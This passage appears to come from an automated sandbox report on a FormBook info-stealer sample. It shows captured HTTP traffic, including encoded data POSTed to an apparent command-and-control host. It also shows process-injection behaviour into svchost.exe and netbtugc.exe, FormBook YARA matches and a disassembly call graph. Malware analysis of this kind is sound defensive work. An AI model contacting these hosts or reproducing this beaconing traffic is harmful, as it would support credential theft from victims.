            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.3xfootball.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:54:27.402843952 CEST691INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:27 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination Port
            54192.168.2.66452452.25.92.080
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:54:34.209228039 CEST786OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38
            Data Ascii: blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
            Aug 2, 2024 13:54:34.837361097 CEST1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:34 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:54:34.837378025 CEST1078INData Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:07:50:22
            Start date:02/08/2024
            Path:C:\Users\user\Desktop\QLLafoDdqv.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\QLLafoDdqv.exe"
            Imagebase:0x6d0000
            File size:1'229'824 bytes
            MD5 hash:9F295F94DFAF4A72EF4AAA28E15543F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:2
            Start time:07:50:23
            Start date:02/08/2024
            Path:C:\Windows\SysWOW64\svchost.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\QLLafoDdqv.exe"
            Imagebase:0x110000
            File size:46'504 bytes
            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:true

            General

            Target ID:3
            Start time:07:50:31
            Start date:02/08/2024
            Path:C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe"
            Imagebase:0xd50000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:4
            Start time:07:50:32
            Start date:02/08/2024
            Path:C:\Windows\SysWOW64\netbtugc.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
            Imagebase:0x1f0000
            File size:22'016 bytes
            MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:false

            General

            Target ID:8
            Start time:07:50:45
            Start date:02/08/2024
            Path:C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe"
            Imagebase:0xd50000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:9
            Start time:07:50:56
            Start date:02/08/2024
            Path:C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase:0x7ff728280000
            File size:676'768 bytes
            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:3.5%
              Dynamic/Decrypted Code Coverage:0.4%
              Signature Coverage:4.5%
              Total number of Nodes:2000
              Total number of Limit Nodes:62
              execution_graph 94665 6d1cad SystemParametersInfoW 94666 723f75 94677 6eceb1 94666->94677 94668 723f8b 94676 724006 94668->94676 94744 6ee300 23 API calls 94668->94744 94671 724052 94674 724a88 94671->94674 94746 74359c 82 API calls __wsopen_s 94671->94746 94673 723fe6 94673->94671 94745 741abf 22 API calls 94673->94745 94686 6dbf40 94676->94686 94678 6ecebf 94677->94678 94679 6eced2 94677->94679 94747 6daceb 23 API calls ISource 94678->94747 94681 6eced7 94679->94681 94682 6ecf05 94679->94682 94748 6efddb 94681->94748 94758 6daceb 23 API calls ISource 94682->94758 94685 6ecec9 94685->94668 94771 6dadf0 94686->94771 94688 6dbf9d 94689 7204b6 94688->94689 94690 6dbfa9 94688->94690 94800 74359c 82 API calls __wsopen_s 94689->94800 94692 6dc01e 94690->94692 94693 7204c6 94690->94693 94776 6dac91 94692->94776 94801 74359c 82 API calls __wsopen_s 94693->94801 94697 6dc7da 94789 6efe0b 94697->94789 94698 737120 22 API calls 94712 6dc039 ISource __fread_nolock 94698->94712 94703 7204f5 94707 72055a 94703->94707 94802 6ed217 235 API calls 94703->94802 94706 6dc808 __fread_nolock 94708 6efe0b 22 API calls 94706->94708 94725 6dc603 94707->94725 94803 74359c 82 API calls __wsopen_s 94707->94803 94714 6dc350 ISource __fread_nolock 94708->94714 94709 6daf8a 22 API calls 94709->94712 94710 72091a 94837 743209 23 API calls 94710->94837 94712->94697 94712->94698 94712->94703 94712->94706 94712->94707 94712->94709 94712->94710 94715 6dec40 235 API calls 94712->94715 94716 7208a5 94712->94716 94719 720591 94712->94719 94721 7208f6 94712->94721 94712->94725 94729 6dc237 94712->94729 94730 6efe0b 22 API calls 94712->94730 94733 6efddb 22 API calls 94712->94733 94739 7209bf 94712->94739 94741 6dbbe0 40 API calls 94712->94741 94780 6dad81 94712->94780 94805 737099 22 API calls __fread_nolock 94712->94805 94806 755745 54 API calls _wcslen 94712->94806 94807 6eaa42 22 API calls ISource 94712->94807 94808 73f05c 40 API calls 94712->94808 94809 6da993 41 API calls 94712->94809 94810 6daceb 23 API calls ISource 94712->94810 94743 6dc3ac 94714->94743 94799 6ece17 22 API calls ISource 94714->94799 94715->94712 94811 6dec40 94716->94811 94804 74359c 82 API calls __wsopen_s 94719->94804 94720 7208cf 94720->94725 94835 6da81b 41 API calls 94720->94835 94836 74359c 82 API calls __wsopen_s 94721->94836 94725->94671 94728 6dc253 94732 720976 94728->94732 94736 6dc297 ISource 94728->94736 94729->94728 94838 6da8c7 94729->94838 94730->94712 94842 6daceb 23 API calls ISource 94732->94842 94733->94712 94736->94739 94787 6daceb 23 API calls ISource 94736->94787 94738 6dc335 94738->94739 94740 6dc342 94738->94740 94739->94725 94843 74359c 82 API calls __wsopen_s 94739->94843 94788 6da704 22 API calls ISource 94740->94788 94741->94712 94743->94671 94744->94673 94745->94676 94746->94674 94747->94685 94751 6efde0 94748->94751 94750 6efdfa 94750->94685 94751->94750 94754 6efdfc 94751->94754 94759 6fea0c 94751->94759 94766 6f4ead 7 API calls 2 library calls 94751->94766 94753 6f066d 94768 6f32a4 RaiseException 94753->94768 94754->94753 94767 6f32a4 RaiseException 94754->94767 94756 6f068a 94756->94685 94758->94685 94764 703820 __dosmaperr 94759->94764 94760 70385e 94770 6ff2d9 20 API calls __dosmaperr 94760->94770 94761 703849 RtlAllocateHeap 94763 70385c 94761->94763 94761->94764 94763->94751 94764->94760 94764->94761 94769 6f4ead 7 API calls 2 library calls 94764->94769 94766->94751 94767->94753 94768->94756 94769->94764 94770->94763 94772 6dae01 94771->94772 94775 6dae1c ISource 94771->94775 94844 6daec9 94772->94844 94774 6dae09 CharUpperBuffW 94774->94775 94775->94688 94777 6dacae 94776->94777 94778 6dacd1 94777->94778 94850 74359c 82 API calls __wsopen_s 94777->94850 94778->94712 94781 71fadb 94780->94781 94782 6dad92 94780->94782 94783 6efddb 22 API calls 94782->94783 94784 6dad99 94783->94784 94851 6dadcd 94784->94851 94787->94738 94788->94714 94791 6efddb 94789->94791 94790 6fea0c ___std_exception_copy 21 API calls 94790->94791 94791->94790 94792 6efdfa 94791->94792 94795 6efdfc 94791->94795 94863 6f4ead 7 API calls 2 library calls 94791->94863 94792->94706 94794 6f066d 94865 6f32a4 RaiseException 94794->94865 94795->94794 94864 6f32a4 RaiseException 94795->94864 94797 6f068a 94797->94706 94799->94714 94800->94693 94801->94725 94802->94707 94803->94725 94804->94725 94805->94712 94806->94712 94807->94712 94808->94712 94809->94712 94810->94712 94832 6dec76 ISource 94811->94832 94812 6f00a3 29 API calls pre_c_initialization 94812->94832 94813 6efddb 22 API calls 94813->94832 94815 6dfef7 94819 6da8c7 22 API calls 94815->94819 94828 6ded9d ISource 94815->94828 94817 724600 94822 6da8c7 22 API calls 94817->94822 94817->94828 94818 724b0b 94882 74359c 82 API calls __wsopen_s 94818->94882 94819->94828 94822->94828 94824 6da8c7 22 API calls 94824->94832 94825 6f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94825->94832 94826 6dfbe3 94826->94828 94829 724bdc 94826->94829 94834 6df3ae ISource 94826->94834 94827 6da961 22 API calls 94827->94832 94828->94720 94883 74359c 82 API calls __wsopen_s 94829->94883 94831 724beb 94884 74359c 82 API calls __wsopen_s 94831->94884 94832->94812 94832->94813 94832->94815 94832->94817 94832->94818 94832->94824 94832->94825 94832->94826 94832->94827 94832->94828 94832->94831 94833 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94832->94833 94832->94834 94866 6e06a0 94832->94866 94880 6e01e0 235 API calls 2 library calls 94832->94880 94833->94832 94834->94828 94881 74359c 82 API calls __wsopen_s 94834->94881 94835->94721 94836->94725 94837->94729 94839 6da8ea __fread_nolock 94838->94839 94840 6da8db 94838->94840 94839->94728 94840->94839 94841 6efe0b 22 API calls 94840->94841 94841->94839 94842->94739 94843->94725 94845 6daedc 94844->94845 94849 6daed9 __fread_nolock 94844->94849 94846 6efddb 22 API calls 94845->94846 94847 6daee7 94846->94847 94848 6efe0b 22 API calls 94847->94848 94848->94849 94849->94774 94850->94778 94855 6daddd 94851->94855 94852 6dadb6 94852->94712 94853 6efddb 22 API calls 94853->94855 94855->94852 94855->94853 94856 6dadcd 22 API calls 94855->94856 94857 6da8c7 22 API calls 94855->94857 94858 6da961 94855->94858 94856->94855 94857->94855 94859 6efe0b 22 API calls 94858->94859 94860 6da976 94859->94860 94861 6efddb 22 API calls 94860->94861 94862 6da984 94861->94862 94862->94855 94863->94791 94864->94794 94865->94797 94869 6e0863 ISource 94866->94869 94872 6e06bd 94866->94872 94867 6e0d36 94870 6e0847 ISource 94867->94870 94888 6eacd5 39 API calls 94867->94888 94869->94867 94869->94870 94873 725ffd 94869->94873 94877 6e082a ISource 94869->94877 94870->94832 94872->94867 94872->94869 94872->94870 94875 6e081e 94872->94875 94872->94877 94876 72600f 94873->94876 94887 6fcf65 39 API calls 94873->94887 94875->94877 94879 725e15 94875->94879 94876->94832 94877->94870 94877->94873 94886 6ece17 22 API calls ISource 94877->94886 94885 6fcf65 39 API calls 94879->94885 94880->94832 94881->94828 94882->94828 94883->94831 94884->94828 94885->94879 94886->94877 94887->94876 94888->94870 94889 6d1044 94894 6d10f3 94889->94894 94891 6d104a 94930 6f00a3 29 API calls __onexit 94891->94930 94893 6d1054 94931 6d1398 94894->94931 94898 6d116a 94899 6da961 22 API calls 94898->94899 94900 6d1174 94899->94900 94901 6da961 22 API calls 94900->94901 94902 6d117e 94901->94902 94903 6da961 22 API calls 94902->94903 94904 6d1188 94903->94904 94905 6da961 22 API calls 94904->94905 94906 6d11c6 94905->94906 94907 6da961 22 API calls 94906->94907 94908 6d1292 94907->94908 94941 6d171c 94908->94941 94912 6d12c4 94913 6da961 22 API calls 94912->94913 94914 6d12ce 94913->94914 94962 6e1940 94914->94962 94916 6d12f9 94972 6d1aab 94916->94972 94918 6d1315 94919 6d1325 GetStdHandle 94918->94919 94920 712485 94919->94920 94921 6d137a 94919->94921 94920->94921 94922 71248e 94920->94922 94924 6d1387 OleInitialize 94921->94924 94923 6efddb 22 API calls 94922->94923 94925 712495 94923->94925 94924->94891 94979 74011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 94925->94979 94927 71249e 94980 740944 CreateThread 94927->94980 94929 7124aa CloseHandle 94929->94921 94930->94893 94981 6d13f1 94931->94981 94934 6d13f1 22 API calls 94935 6d13d0 94934->94935 94936 6da961 22 API calls 94935->94936 94937 6d13dc 94936->94937 94988 6d6b57 94937->94988 94939 6d1129 94940 6d1bc3 6 API calls 94939->94940 94940->94898 94942 6da961 22 API calls 94941->94942 94943 6d172c 94942->94943 94944 6da961 22 API calls 94943->94944 94945 6d1734 94944->94945 94946 6da961 22 API calls 94945->94946 94947 6d174f 94946->94947 94948 6efddb 22 API calls 94947->94948 94949 6d129c 94948->94949 94950 6d1b4a 94949->94950 94951 6d1b58 94950->94951 94952 6da961 22 API calls 94951->94952 94953 6d1b63 94952->94953 94954 6da961 22 API calls 94953->94954 94955 6d1b6e 94954->94955 94956 6da961 22 API calls 94955->94956 94957 6d1b79 94956->94957 94958 6da961 22 API calls 94957->94958 94959 6d1b84 94958->94959 94960 6efddb 22 API calls 94959->94960 94961 6d1b96 RegisterWindowMessageW 94960->94961 94961->94912 94963 6e1981 94962->94963 94966 6e195d 94962->94966 95005 6f0242 5 API calls __Init_thread_wait 94963->95005 94971 6e196e 94966->94971 95007 6f0242 5 API calls __Init_thread_wait 94966->95007 94967 6e198b 94967->94966 95006 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94967->95006 94968 6e8727 94968->94971 95008 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94968->95008 94971->94916 94973 6d1abb 94972->94973 94974 71272d 94972->94974 94975 6efddb 22 API calls 94973->94975 95009 743209 23 API calls 94974->95009 94977 6d1ac3 94975->94977 94977->94918 94978 712738 94979->94927 94980->94929 95010 74092a 28 API calls 94980->95010 94982 6da961 22 API calls 94981->94982 94983 6d13fc 94982->94983 94984 6da961 22 API calls 94983->94984 94985 6d1404 94984->94985 94986 6da961 22 API calls 94985->94986 94987 6d13c6 94986->94987 94987->94934 94989 714ba1 94988->94989 94990 6d6b67 _wcslen 94988->94990 95001 6d93b2 94989->95001 94993 6d6b7d 94990->94993 94994 6d6ba2 94990->94994 94992 714baa 94992->94992 95000 6d6f34 22 API calls 94993->95000 94996 6efddb 22 API calls 94994->94996 94997 6d6bae 94996->94997 94998 6efe0b 22 API calls 94997->94998 94999 6d6b85 __fread_nolock 94998->94999 94999->94939 95000->94999 95002 6d93c9 __fread_nolock 95001->95002 95003 6d93c0 95001->95003 95002->94992 95003->95002 95004 6daec9 22 API calls 95003->95004 95004->95002 95005->94967 95006->94966 95007->94968 95008->94971 95009->94978 95011 7090fa 95012 709107 95011->95012 95016 70911f 95011->95016 95068 6ff2d9 20 API calls __dosmaperr 95012->95068 95014 70910c 95069 7027ec 26 API calls __fread_nolock 95014->95069 95017 70917a 95016->95017 95025 709117 95016->95025 95070 70fdc4 21 API calls 2 library calls 95016->95070 95031 6fd955 95017->95031 95020 709192 95038 708c32 95020->95038 95022 709199 95023 6fd955 __fread_nolock 26 API calls 95022->95023 95022->95025 95024 7091c5 95023->95024 95024->95025 95026 6fd955 __fread_nolock 26 API calls 95024->95026 95027 7091d3 95026->95027 95027->95025 95028 6fd955 __fread_nolock 26 API calls 95027->95028 95029 7091e3 95028->95029 95030 6fd955 __fread_nolock 26 API calls 95029->95030 95030->95025 95032 6fd976 95031->95032 95033 6fd961 95031->95033 95032->95020 95071 6ff2d9 20 API calls __dosmaperr 95033->95071 95035 6fd966 95072 7027ec 26 API calls __fread_nolock 95035->95072 95037 6fd971 95037->95020 95039 708c3e ___scrt_is_nonwritable_in_current_image 95038->95039 95040 708c46 95039->95040 95041 708c5e 95039->95041 95139 6ff2c6 20 API calls __dosmaperr 95040->95139 95042 708d24 95041->95042 95046 708c97 95041->95046 95146 6ff2c6 20 API calls __dosmaperr 95042->95146 95045 708c4b 95140 6ff2d9 20 API calls __dosmaperr 95045->95140 95050 708ca6 95046->95050 95051 708cbb 95046->95051 95047 708d29 95147 6ff2d9 20 API calls __dosmaperr 95047->95147 95049 708c53 __fread_nolock 95049->95022 95141 6ff2c6 20 API calls __dosmaperr 95050->95141 95073 705147 EnterCriticalSection 95051->95073 95055 708cb3 95148 7027ec 26 API calls __fread_nolock 95055->95148 95056 708cab 95142 6ff2d9 20 API calls __dosmaperr 95056->95142 95057 708cc1 95059 708cf2 95057->95059 95060 708cdd 95057->95060 95074 708d45 95059->95074 95143 6ff2d9 20 API calls __dosmaperr 95060->95143 95064 708ce2 95144 6ff2c6 20 API calls __dosmaperr 95064->95144 95066 708ced 95145 708d1c LeaveCriticalSection __wsopen_s 95066->95145 95068->95014 95069->95025 95070->95017 95071->95035 95072->95037 95073->95057 95075 708d57 95074->95075 95076 708d6f 95074->95076 95158 6ff2c6 20 API calls __dosmaperr 95075->95158 95077 7090d9 95076->95077 95083 708db4 95076->95083 95180 6ff2c6 20 API calls __dosmaperr 95077->95180 95080 708d5c 95159 6ff2d9 20 API calls __dosmaperr 95080->95159 95082 7090de 95181 6ff2d9 20 API calls __dosmaperr 95082->95181 95084 708d64 95083->95084 95086 708dbf 95083->95086 95092 708def 95083->95092 95084->95066 95160 6ff2c6 20 API calls __dosmaperr 95086->95160 95087 708dcc 95182 7027ec 26 API calls __fread_nolock 95087->95182 95089 708dc4 95161 6ff2d9 20 API calls __dosmaperr 95089->95161 95093 708e08 95092->95093 95094 708e4a 95092->95094 95095 708e2e 95092->95095 95093->95095 95128 708e15 95093->95128 95165 703820 21 API calls 2 library calls 95094->95165 95162 6ff2c6 20 API calls __dosmaperr 95095->95162 95097 708e33 95163 6ff2d9 20 API calls __dosmaperr 95097->95163 95101 708e61 95166 7029c8 95101->95166 95102 708e3a 95164 7027ec 26 API calls __fread_nolock 95102->95164 95103 708fb3 95107 709029 95103->95107 95110 708fcc GetConsoleMode 95103->95110 95105 708e6a 95108 7029c8 _free 20 API calls 95105->95108 95109 70902d ReadFile 95107->95109 95111 708e71 95108->95111 95112 7090a1 GetLastError 95109->95112 95113 709047 95109->95113 95110->95107 95114 708fdd 95110->95114 95115 708e96 95111->95115 95116 708e7b 95111->95116 95117 709005 95112->95117 95118 7090ae 95112->95118 95113->95112 95119 70901e 95113->95119 95114->95109 95120 708fe3 ReadConsoleW 95114->95120 95174 709424 28 API calls __wsopen_s 95115->95174 95172 6ff2d9 20 API calls __dosmaperr 95116->95172 95137 708e45 __fread_nolock 95117->95137 95175 6ff2a3 20 API calls 2 library calls 95117->95175 95178 6ff2d9 20 API calls __dosmaperr 95118->95178 95132 709083 95119->95132 95133 70906c 95119->95133 95119->95137 95120->95119 95125 708fff GetLastError 95120->95125 95121 7029c8 _free 20 API calls 95121->95084 95125->95117 95126 708e80 95173 6ff2c6 20 API calls __dosmaperr 95126->95173 95127 7090b3 95179 6ff2c6 20 API calls __dosmaperr 95127->95179 95149 70f89b 